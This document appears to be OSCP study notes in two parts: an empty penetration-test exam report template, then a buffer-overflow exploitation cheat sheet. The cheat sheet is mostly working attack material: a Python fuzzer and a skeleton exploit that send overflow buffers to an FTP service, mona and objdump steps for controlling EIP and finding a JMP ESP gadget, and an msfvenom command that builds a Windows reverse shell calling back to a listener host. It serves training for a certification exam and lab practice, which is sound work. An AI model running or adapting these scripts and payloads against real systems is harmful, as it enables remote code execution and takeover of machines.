 41 | - 1 Offensive Security Exam Penetration Test Report
 42 |    - 1.1 Introduction
 43 |    - 1.2 Objective
 44 |    - 1.3 Requirements
 45 | - 2 High-Level Summary
 46 |    - 2.1 Recommendations
 47 | - 3 Methodologies
 48 |    - 3.1 Information Gathering
 49 |    - 3.2 Penetration
 50 |       - 3.2.1 System IP: 192.168.x.x
 51 |          - 3.2.1.1 Service Enumeration
 52 |          - 3.2.1.2 Privilege Escalation
 53 |       - 3.2.2 System IP: 192.168.x.x
 54 |          - 3.2.2.1 Service Enumeration
 55 |          - 3.2.2.2 Privilege Escalation
 56 |       - 3.2.3 System IP: 192.168.x.x
 57 |          - 3.2.3.1 Service Enumeration
 58 |          - 3.2.3.2 Privilege Escalation
 59 |       - 3.2.4 System IP: 192.168.x.x
 60 |          - 3.2.4.1 Service Enumeration
 61 |          - 3.2.4.2 Privilege Escalation
 62 |       - 3.2.5 System IP: 192.168.x.x
 63 |    - 3.3 Maintaining Access
 64 |    - 3.4 House Cleaning
 65 | - 4 Additional Items
 66 |    - 4.1 Appendix - Proof and Local Contents:
 67 |    - 4.2 Appendix - Metasploit/Meterpreter Usage
 68 | 
 69 | <div style="page-break-after: always;"></div>
 70 | 
 71 | ## Introduction
 72 | 
 73 | The Offensive Security Exam penetration test report contains all efforts that were conducted in order to pass the Offensive Security exam.
 74 | This report will be graded from a standpoint of correctness and fullness to all aspects of the exam.
 75 | The purpose of this report is to ensure that the student has a full understanding of penetration testing methodologies as well as the technical knowledge to pass the qualifications for the Offensive Security Certified Professional.
 76 | 
 77 | ## Objective
 78 | 
 79 | The objective of this assessment is to perform an internal penetration test against the Offensive Security Lab/Exam network.
 80 | The student is tasked with following methodical approach in obtaining access to the objective goals.
 81 | This test should simulate an actual penetration test and how you would start from beginning to end, including the overall report.
 82 | An example page has already been created for you at the latter portions of this document that should give you ample information on what is expected to pass this course.
 83 | Use the sample report as a guideline to get you through the reporting.
 84 | 
 85 | ## Requirements
 86 | 
 87 | The student will be required to fill out this penetration testing report fully and to include the following sections:
 88 | 
 89 | - Overall High-Level Summary and Recommendations (non-technical)
 90 | - Methodology walkthrough and detailed outline of steps taken
 91 | - Each finding with included screenshots, walkthrough, sample code, and proof.txt if applicable
 92 | - Any additional items that were not included
 93 | 
 94 | <div style="page-break-after: always;"></div>
 95 | 
 96 | # High-Level Summary
 97 | 
 98 | I was tasked with performing an internal penetration test towards Offensive Security Exam.
 99 | An internal penetration test is a dedicated attack against internally connected systems.
100 | The focus of this test is to perform attacks, similar to those of a hacker and attempt to infiltrate Offensive Security’s internal exam systems – the THINC.local domain.
101 | My overall objective was to evaluate the network, identify systems, and exploit flaws while reporting the findings back to Offensive Security.
102 | 
103 | When performing the internal penetration test, there were several alarming vulnerabilities that were identified on Offensive Security’s network.
104 | When performing the attacks, I was able to gain access to multiple machines, primarily due to outdated patches and poor security configurations.
105 | During the testing, I had administrative level access to multiple systems.
106 | All systems were successfully exploited and access granted.
107 | These systems as well as a brief description on how access was obtained are listed below:
108 | 
109 | - 192.168.xx.xx (hostname) - Name of initial exploit
110 | - 192.168.xx.xx (hostname) - Name of initial exploit
111 | - 192.168.xx.xx (hostname) - Name of initial exploit
112 | - 192.168.xx.xx (hostname) - Name of initial exploit
113 | - 192.168.xx.xx (hostname) - BOF
114 | 
115 | ## Recommendations
116 | 
117 | I recommend patching the vulnerabilities identified during the testing to ensure that an attacker cannot exploit these systems in the future.
118 | One thing to remember is that these systems require frequent patching and once patched, should remain on a regular patch program to protect additional vulnerabilities that are discovered at a later date.
119 | 
120 | <div style="page-break-after: always;"></div>
121 | 
122 | # Methodologies
123 | 
124 | I utilized a widely adopted approach to performing penetration testing that is effective in testing how well the Offensive Security Exam environments is secured.
125 | Below is a breakout of how I was able to identify and exploit the variety of systems and includes all individual vulnerabilities found.
126 | 
127 | ## Information Gathering
128 | 
129 | The information gathering portion of a penetration test focuses on identifying the scope of the penetration test.
130 | During this penetration test, I was tasked with exploiting the exam network.
131 | The specific IP addresses were:
132 | 
133 | **Exam Network**
134 | 
135 | - 192.168.
136 | - 192.168.
137 | - 192.168.
138 | - 192.168.
139 | - 192.168.
140 | 
141 | ## Penetration
142 | 
143 | The penetration testing portions of the assessment focus heavily on gaining access to a variety of systems.
144 | During this penetration test, I was able to successfully gain access to **X** out of the **X** systems.
145 | 
146 | <div style="page-break-after: always;"></div>
147 | 
148 | ### System IP: 192.168.x.x
149 | 
150 | #### Service Enumeration
151 | 
152 | The service enumeration portion of a penetration test focuses on gathering information about what services are alive on a system or systems.
153 | This is valuable for an attacker as it provides detailed information on potential attack vectors into a system.
154 | Understanding what applications are running on the system gives an attacker needed information before performing the actual penetration test.
155 | In some cases, some ports may not be listed.
156 | 
157 | Server IP Address | Ports Open
158 | ------------------|----------------------------------------
159 | 192.168.x.x       | **TCP**: 80,443
160 | **UDP**: 1434,161
161 | 
162 | **Nmap Scan Results:**
163 | 
164 | *Initial Shell Vulnerability Exploited*
165 | 
166 | *Additional info about where the initial shell was acquired from*
167 | 
168 | **Vulnerability Explanation:**
169 | 
170 | **Vulnerability Fix:**
171 | 
172 | **Severity:**
173 | 
174 | **Proof of Concept Code Here:**
175 | 
176 | **Local.txt Proof Screenshot**
177 | 
178 | **Local.txt Contents**
179 | 
180 | #### Privilege Escalation
181 | 
182 | *Additional Priv Esc info*
183 | 
184 | **Vulnerability Exploited:**
185 | 
186 | **Vulnerability Explanation:**
187 | 
188 | **Vulnerability Fix:**
189 | 
190 | **Severity:**
191 | 
192 | **Exploit Code:**
193 | 
194 | **Proof Screenshot Here:**
195 | 
196 | **Proof.txt Contents:**
197 | 
198 | <div style="page-break-after: always;"></div>
199 | 
200 | ### System IP: 192.168.x.x
201 | 
202 | #### Service Enumeration
203 | 
204 | Server IP Address | Ports Open
205 | ------------------|----------------------------------------
206 | 192.168.x.x       | **TCP**: 80,443
207 | **UDP**: 1434,161
208 | 
209 | **Nmap Scan Results:**
210 | 
211 | *Initial Shell Vulnerability Exploited*
212 | 
213 | *Additional info about where the initial shell was acquired from*
214 | 
215 | **Vulnerability Explanation:**
216 | 
217 | **Vulnerability Fix:**
218 | 
219 | **Severity:**
220 | 
221 | **Proof of Concept Code Here:**
222 | 
223 | **Local.txt Proof Screenshot**
224 | 
225 | **Local.txt Contents**
226 | 
227 | #### Privilege Escalation
228 | 
229 | *Additional Priv Esc info*
230 | 
231 | **Vulnerability Exploited:**
232 | 
233 | **Vulnerability Explanation:**
234 | 
235 | **Vulnerability Fix:**
236 | 
237 | **Severity:**
238 | 
239 | **Exploit Code:**
240 | 
241 | **Proof Screenshot Here:**
242 | 
243 | **Proof.txt Contents:**
244 | 
245 | <div style="page-break-after: always;"></div>
246 | 
247 | ### System IP: 192.168.x.x
248 | 
249 | #### Service Enumeration
250 | 
251 | Server IP Address | Ports Open
252 | ------------------|----------------------------------------
253 | 192.168.x.x       | **TCP**: 80,443
254 | **UDP**: 1434,161
255 | 
256 | **Nmap Scan Results:**
257 | 
258 | *Initial Shell Vulnerability Exploited*
259 | 
260 | *Additional info about where the initial shell was acquired from*
261 | 
262 | **Vulnerability Explanation:**
263 | 
264 | **Vulnerability Fix:**
265 | 
266 | **Severity:**
267 | 
268 | **Proof of Concept Code Here:**
269 | 
270 | **Local.txt Proof Screenshot**
271 | 
272 | **Local.txt Contents**
273 | 
274 | #### Privilege Escalation
275 | 
276 | *Additional Priv Esc info*
277 | 
278 | **Vulnerability Exploited:**
279 | 
280 | **Vulnerability Explanation:**
281 | 
282 | **Vulnerability Fix:**
283 | 
284 | **Severity:**
285 | 
286 | **Exploit Code:**
287 | 
288 | **Proof Screenshot Here:**
289 | 
290 | **Proof.txt Contents:**
291 | 
292 | <div style="page-break-after: always;"></div>
293 | 
294 | ### System IP: 192.168.x.x
295 | 
296 | #### Service Enumeration
297 | 
298 | Server IP Address | Ports Open
299 | ------------------|----------------------------------------
300 | 192.168.x.x       | **TCP**: 80,443
301 | **UDP**: 1434,161
302 | 
303 | **Nmap Scan Results:**
304 | 
305 | *Initial Shell Vulnerability Exploited*
306 | 
307 | *Additional info about where the initial shell was acquired from*
308 | 
309 | **Vulnerability Explanation:**
310 | 
311 | **Vulnerability Fix:**
312 | 
313 | **Severity:**
314 | 
315 | **Proof of Concept Code Here:**
316 | 
317 | **Local.txt Proof Screenshot**
318 | 
319 | **Local.txt Contents**
320 | 
321 | #### Privilege Escalation
322 | 
323 | *Additional Priv Esc info*
324 | 
325 | **Vulnerability Exploited:**
326 | 
327 | **Vulnerability Explanation:**
328 | 
329 | **Vulnerability Fix:**
330 | 
331 | **Severity:**
332 | 
333 | **Exploit Code:**
334 | 
335 | **Proof Screenshot Here:**
336 | 
337 | **Proof.txt Contents:**
338 | 
339 | <div style="page-break-after: always;"></div>
340 | 
341 | ### System IP: 192.168.x.x
342 | 
343 | **Vulnerability Exploited: **
344 | 
345 | **Proof Screenshot:**
346 | 
347 | <div style="page-break-after: always;"></div>
348 | 
349 | ## Maintaining Access
350 | 
351 | Maintaining access to a system is important to us as attackers, ensuring that we can get back into a system after it has been exploited is invaluable.
352 | The maintaining access phase of the penetration test focuses on ensuring that once the focused attack has occurred (i.e. a buffer overflow), we have administrative access over the system again.
353 | Many exploits may only be exploitable once and we may never be able to get back into a system after we have already performed the exploit.
354 | 
355 | ## House Cleaning
356 | 
357 | The house cleaning portions of the assessment ensures that remnants of the penetration test are removed.
358 | Often fragments of tools or user accounts are left on an organization's computer which can cause security issues down the road.
359 | Ensuring that we are meticulous and no remnants of our penetration test are left over is important.
360 | 
361 | After collecting trophies from the exam network was completed, Alec removed all user accounts and passwords as well as the Meterpreter services installed on the system.
362 | Offensive Security should not have to remove any user accounts or services from the system.
363 | 
364 | <div style="page-break-after: always;"></div>
365 | 
366 | 
367 | # Additional Items
368 | 
369 | ## Appendix - Proof and Local Contents:
370 | 
371 | IP (Hostname) | Local.txt Contents | Proof.txt Contents
372 | --------------|--------------------|-------------------
373 | 192.168.x.x   | hash_here          | hash_here
374 | 192.168.x.x   | hash_here          | hash_here
375 | 192.168.x.x   | hash_here          | hash_here
376 | 192.168.x.x   | hash_here          | hash_here
377 | 192.168.x.x   | hash_here          | hash_here
378 | 
379 | ## Appendix - Metasploit/Meterpreter Usage
380 | 
381 | For the exam, I used my Metasploit/Meterpreter allowance on the following machine: `192.168.x.x`
382 | 
383 | <br>
384 | 


--------------------------------------------------------------------------------
/Exploitation/Buffer_overflow.md:
--------------------------------------------------------------------------------
  1 | Buffer Overflows
  2 | =================
  3 | Taken from Tiberius's https://github.com/Tib3rius/Pentest-Cheatsheets/blob/master/exploits/buffer-overflows.rst, my notes added   
  4 | 
  5 | - [Resources](#resources) 
  6 | - [Immunity Debugger](#immunity-debugger)
  7 | - [Mona Setup](#mona-setup)
  8 | - [Fuzzing](#fuzzing)
  9 | - [Crash Replication & Controlling EIP](#crash-replication---controlling-eip)
 10 | - [Finding Bad Characters](#finding-bad-characters)
 11 | - [Find a Jump Point](#find-a-jump-point)
 12 | - [Popping calc.exe](#popping-calcexe)
 13 | - [Generate Payload](#generate-payload)
 14 | - [Prepend NOPs](#prepend-nops)
 15 | - [Final Buffer](#final-buffer)
 16 | - [Buffer Overflow Practice](#buffer-overflow-practice)
 17 | - [Basic Background Knowledge](#basic-background-knowledge)
 18 | 
 19 | Resources
 20 | =================     
 21 | 
 22 | * https://bytesoverbombs.io/exploiting-a-64-bit-buffer-overflow-469e8b500f10
 23 | * https://www.abatchy.com/2017/05/jumping-to-shellcode.html
 24 | * http://www.voidcn.com/article/p-ulyzzbfx-z.html
 25 | * https://www.securitysift.com/windows-exploit-development-part-4-locating-shellcode-jumps/
 26 | * https://medium.com/@johntroony/a-practical-overview-of-stack-based-buffer-overflow-7572eaaa4982
 27 | * https://strongcourage.github.io/2020/04/19/bof.html  
 28 | * https://liodeus.github.io/2020/08/11/bufferOverflow.html    
 29 | 
 30 | 
 31 | Immunity Debugger
 32 | =================
 33 | 
 34 | **Always run Immunity Debugger as Administrator if you can.**
 35 | 
 36 | There are generally two ways to use Immunity Debugger to debug an application:
 37 | 
 38 | 1. Make sure the application is running, open Immunity Debugger, and then use :code:`File -> Attach` to attack the debugger to the running process.
 39 | 2. Open Immunity Debugger, and then use :code:`File -> Open` to run the application.
 40 | 
 41 | When attaching to an application or opening an application in Immunity Debugger, the application will be paused. Click the "Run" button or press F9.
 42 | 
 43 | Note: If the binary you are debugging is a Windows service, you may need to restart the application via :code:`sc`
 44 | 
 45 |     sc stop SLmail
 46 |     sc start SLmail
 47 | 
 48 | Some applications are configured to be started from the service manager and will not work unless started by service control.
 49 | 
 50 | Mona Setup
 51 | ==========
 52 | 
 53 | Mona is a powerful plugin for Immunity Debugger that makes exploiting buffer overflows much easier. Download: :download:`mona.py <../_static/files/mona.py>`
 54 | 
 55 | | The latest version can be downloaded here: https://github.com/corelan/mona
 56 | | The manual can be found here: https://www.corelan.be/index.php/2011/07/14/mona-py-the-manual/
 57 | 
 58 | Copy the mona.py file into the PyCommands directory of Immunity Debugger (usually located at C:\\Program Files\\Immunity Inc\\Immunity Debugger\\PyCommands).
 59 | 
 60 | In Immunity Debugger, type the following to set a working directory for mona.
 61 | 
 62 |     !mona config -set workingfolder c:\mona\%p
 63 | 
 64 | Fuzzing
 65 | =======
 66 | 
 67 | The following Python script can be modified and used to fuzz remote entry points to an application. It will send increasingly long buffer strings in the hope that one eventually crashes the application.
 68 | 
 69 |     import socket, time, sys
 70 | 
 71 |     ip = "10.0.0.1"
 72 |     port = 21
 73 |     timeout = 5
 74 | 
 75 |     # Create an array of increasing length buffer strings.
 76 |     buffer = []
 77 |     counter = 100
 78 |     while len(buffer) < 30:
 79 |         buffer.append("A" * counter)
 80 |         counter += 100
 81 | 
 82 |     for string in buffer:
 83 |         try:
 84 |             s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
 85 |             s.settimeout(timeout)
 86 |             connect = s.connect((ip, port))
 87 |             s.recv(1024)
 88 |             s.send("USER username\r\n")
 89 |             s.recv(1024)
 90 | 
 91 |             print("Fuzzing PASS with %s bytes" % len(string))
 92 |             s.send("PASS " + string + "\r\n")
 93 |             s.recv(1024)
 94 |             s.send("QUIT\r\n")
 95 |             s.recv(1024)
 96 |             s.close()
 97 |         except:
 98 |             print("Could not connect to " + ip + ":" + str(port))
 99 |             sys.exit(0)
100 |         time.sleep(1)
101 | 
102 | Check that the EIP register has been overwritten by A's (\\x41). Make a note of any other registers that have either been overwritten, or are pointing to space in memory which has been overwritten.
103 | 
104 | Crash Replication & Controlling EIP
105 | ===================================
106 | 
107 | The following skeleton exploit code can be used for the rest of the buffer overflow exploit:
108 | 
109 |     import socket
110 |     
111 |     ip = "10.0.0.1"
112 |     port = 21
113 |     
114 |     prefix = ""
115 |     offset = 0
116 |     overflow = "A" * offset
117 |     retn = ""
118 |     padding = ""
119 |     payload = ""
120 |     postfix = ""
121 |     
122 |     buffer = prefix + overflow + retn + padding + payload + postfix
123 |     
124 |     s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
125 |     
126 |     try:
127 |         s.connect((ip, port))
128 |         print("Sending evil buffer...")
129 |         s.send(buffer + "\r\n")
130 |         print("Done!")
131 |     except:
132 |         print("Could not connect.")
133 | 
134 | Using the buffer length which caused the crash, generate a unique buffer so we can determine the offset in the pattern which overwrites the EIP register, and the offset in the pattern to which other registers point. Create a pattern that is 400 bytes larger than the crash buffer, so that we can determine whether our shellcode can fit immediately. If the larger buffer doesn't crash the application, use a pattern equal to the crash buffer length and slowly add more to the buffer to find space.
135 | 
136 | 
137 |     $ /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 600
138 |     Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag
139 | 
140 | While the unique buffer is on the stack, use mona's findmsp command, with the distance argument set to the pattern length.
141 | 
142 | 
143 |     !mona findmsp -distance 600
144 |     ...
145 |     [+] Looking for cyclic pattern in memory
146 |     Cyclic pattern (normal) found at 0x005f3614 (length 600 bytes)
147 |     Cyclic pattern (normal) found at 0x005f4a40 (length 600 bytes)
148 |     Cyclic pattern (normal) found at 0x017df764 (length 600 bytes)
149 |     EIP contains normal pattern : 0x78413778 (offset 112)
150 |     ESP (0x017dfa30) points at offset 116 in normal pattern (length 484)
151 |     EAX (0x017df764) points at offset 0 in normal pattern (length 600)
152 |     EBP contains normal pattern : 0x41367841 (offset 108)
153 |     ...
154 | 
155 | Note the EIP offset (112) and any other registers that point to the pattern, noting their offsets as well. It seems like the ESP register points to the last 484 bytes of the pattern, which is enough space for our shellcode.
156 | 
157 | Create a new buffer using this information to ensure that we can control EIP:
158 | 
159 | 
160 |     prefix = ""
161 |     offset = 112
162 |     overflow = "A" * offset
163 |     retn = "BBBB"
164 |     padding = ""
165 |     payload = "C" * (600-112-4)
166 |     postfix = ""
167 |     
168 |     buffer = prefix + overflow + retn + padding + payload + postfix
169 | 
170 | Crash the application using this buffer, and make sure that EIP is overwritten by B's (\\x42) and that the ESP register points to the start of the C's (\\x43).
171 | 
172 | Finding Bad Characters
173 | ======================
174 | Common bad chars: \\x00 (NULL byte), \\x0A, \\x0D, bad chars often corrupt the next byte after them so just take the first one in a sequence of 2!   
175 | 
176 | Generate a bytearray using mona, and exclude the null byte (\\x00) by default. Note the location of the bytearray.bin file that is generated.
177 | 
178 | 
179 |     !mona bytearray -b "\x00"
180 | 
181 | Now generate a string of bad chars that is identical to the bytearray. The following python script can be used to generate a string of bad chars from \\x01 to \\xff:
182 | 
183 | 
184 |     #!/usr/bin/env python
185 |     from __future__ import print_function
186 | 
187 |     for x in range(1, 256):
188 |         print("\\x" + "{:02x}".format(x), end='')
189 | 
190 |     print()
191 | 
192 | Put the string of bad chars before the C's in your buffer, and adjust the number of C's to compensate:
193 | 
194 | 
195 |     badchars = "\x01\x02\x03\x04\x05...\xfb\xfc\xfd\xfe\xff"
196 |     payload = badchars + "C" * (600-112-4-255)
197 | 
198 | Crash the application using this buffer, and make a note of the address to which ESP points. This can change every time you crash the application, so get into the habit of copying it from the register each time.
199 | 
200 | Use the mona compare command to reference the bytearray you generated, and the address to which ESP points:
201 | 
202 | 
203 |     !mona compare -f C:\mona\appname\bytearray.bin -a <address>
204 | 
205 | Find a Jump Point
206 | =================
207 | 
208 | The mona jmp command can be used to search for jmp (or equivalent) instructions to a specific register. The jmp command will, by default, ignore any modules that are marked as aslr or rebase.
209 | 
210 | The following example searches for "jmp esp" or equivalent (e.g. call esp, push esp; retn, etc.) while ensuring that the address of the instruction doesn't contain the bad chars \\x00, \\x0a, and \\x0d.
211 | 
212 | 
213 |     !mona jmp -r esp -cpb "\x00\x0a\x0d"
214 | 
215 | The mona find command can similarly be used to find specific instructions, though for the most part, the jmp command is sufficient:
216 | 
217 | 
218 |     !mona find -s 'jmp esp' -type instr -cm aslr=false,rebase=false,nx=false -cpb "\x00\x0a\x0d"
219 |     
220 |     
221 | 
222 | Alternate method: on attack box, search DLL file for JMP ESP (\xff\xd4)  
223 |  
224 |  
225 |     objdump -d essfunc.dll | grep 'ff e4'
226 |     
227 | Insert address into script as retn variable, with bytes flipped. 
228 | Ex.
229 | 
230 |     retn = "\xdf\x14\x50\x62"      #0x625014df       
231 |     
232 | Insert NOPs
233 | 
234 |     padding = "\x90" * 16
235 |  
236 | 
237 |     
238 | Popping calc.exe    
239 | ================   
240 | 
241 | Not getting a shell connection: test if offset, bad chars and JMP ESP are correct by running calc.exe.  
242 | 
243 | 
244 |     msfvenom -p windows/exec CMD=calc.exe -b "\x00" -f c         
245 | 
246 | 
247 | Generate Payload
248 | ================
249 | 
250 | Generate a reverse shell payload using msfvenom, making sure to exclude the same bad chars that were found previously:
251 | 
252 | 
253 |     msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.92 LPORT=53 EXITFUNC=thread -b "\x00\x0a\x0d" -f c    
254 |     
255 | copy C shellcode and insert into python script as payload = ("\xfc\xbb\xa1\..multiple lines..6\xa2\xeb\x0c")
256 | 
257 | Prepend NOPs
258 | ============
259 | 
260 | If an encoder was used (more than likely if bad chars are present, remember to prepend at least 16 NOPs (\\x90) to the payload.
261 | 
262 | Final Buffer
263 | ============
264 | 
265 |     prefix = ""
266 |     offset = 112
267 |     overflow = "A" * offset
268 |     retn = "\x56\x23\x43\x9A"
269 |     padding = "\x90" * 16
270 |     payload = "\xdb\xde\xba\x69\xd7\xe9\xa8\xd9\x74\x24\xf4\x58\x29\xc9\xb1..."
271 |     postfix = ""
272 |     
273 |     buffer = prefix + overflow + retn + padding + payload + postfix
274 | 
275 | Buffer Overflow Practice
276 | ========================
277 | 
278 | * https://github.com/justinsteven/dostackbufferoverflowgood
279 | * https://github.com/stephenbradshaw/vulnserver
280 | * https://www.vortex.id.au/2017/05/pwkoscp-stack-buffer-overflow-practice/    
281 | 
282 | 
283 | Basic Background Knowledge  
284 | ========================    
285 | The Cyber Mentor Buffer Overflow Videos: https://www.youtube.com/watch?v=qSnPayW6F7U&list=PLLKT__MCUeix3O0DPbmuaRuR_4Hxo4m3G        
286 | Walkthrough Guide for TCM Videos: https://github.com/johnjhacking/Buffer-Overflow-Guide       
287 | Identifying bad characters: https://www.ins1gn1a.com/identifying-bad-characters/      
288 | [Buffer overflow for Dummies Whitepaper](https://www.sans.org/white-papers/481/)  
289 | 
290 | Further Study       
291 | ========================   
292 | [Buffer Overflow Attack - Computerphile](https://www.youtube.com/watch?v=1S0aBV-Waeo)  
293 | [Exploit writing tutorial part 1 : Stack Based Overflows](https://www.corelan.be/index.php/2009/07/19/exploit-writing-tutorial-part-1-stack-based-overflows/)  
294 | [Useful resources for Learning and Hands on practice for buffer overflows](https://github.com/security-prince/PWK-OSCP-Preparation-Roadmap/blob/master/BOF)  
295 | [Basic Reverse Engineering with Immunity Debugger](https://www.sans.org/white-papers/36982/)   
296 | https://thor-sec.com/tutorial/oscp/basic_bufferoverflows/    
297 | http://0xdeadcode.se/archives/178 <-- minishare   
298 | [PWK OSCP Stack Overflow Practice](https://www.vortex.id.au/2017/05/pwkoscp-stack-buffer-overflow-practice/)   
299 | [Smashing The Stack For Fun And Profit](https://www.eecs.umich.edu/courses/eecs588/static/stack_smashing.pdf)   
300 | [Identifying bad characters](https://www.ins1gn1a.com/identifying-bad-characters/)   
301 | [OSCP Buffer Overflows](https://strongcourage.github.io/2020/04/19/bof.html)  
302 | 
303 | 
304 | Examples of Buffer Overflows      
305 | http://camelinc.info/blog/2014/05/Aviosoft-Digital-TV-Player-Professional-1.0-Stack-Buffer-Overflow/   
306 | https://royleekiat.com/2016/01/15/buffer-overflow-attack-on-pcman-ftp-server-2-07-using-the-metasploit-framework-and-corelan-teams-mona-script/ *using msf*           
307 | https://www.mattandreko.com/2013/04/06/buffer-overflow-in-hexchat-294/            
308 | http://rgolebiowski.blogspot.in/2016/02/brain-pain.html            
309 | 
310 | 
311 | Advanced Buffer Overflows    
312 | http://tekwizz123.blogspot.in/2014/02/bypassing-aslr-and-dep-on-windows-7.html?m=1   
313 | https://bogner.sh/2016/04/the-hard-life-of-exploit-developers/    
314 | http://netsec.ws/?p=180     
315 | http://n01g3l.tumblr.com/post/49036035399/linux-crossfire-v190-buffer-overflow     
316 | http://sh3llc0d3r.com/vulnserver-trun-command-buffer-overflow-exploit/           
317 | http://www.securitysift.com/windows-exploit-development-part-2-intro-stack-overflow/      
318 | http://proactivedefender.blogspot.in/2013/05/understanding-buffer-overflows.html?m=1       
319 | https://rootisthelimit.com/first-buffer-overflow/ <-- Ability 2.34     
320 | 
321 | 64 bit buffer overflows:   
322 | https://blog.techorganic.com/2015/04/10/64-bit-linux-stack-smashing-tutorial-part-1/      
323 | 
324 | Heap Overflows 
325 | [Heap Exploitation](https://heap-exploitation.dhavalkapil.com/)     
326 | 
327 | 


--------------------------------------------------------------------------------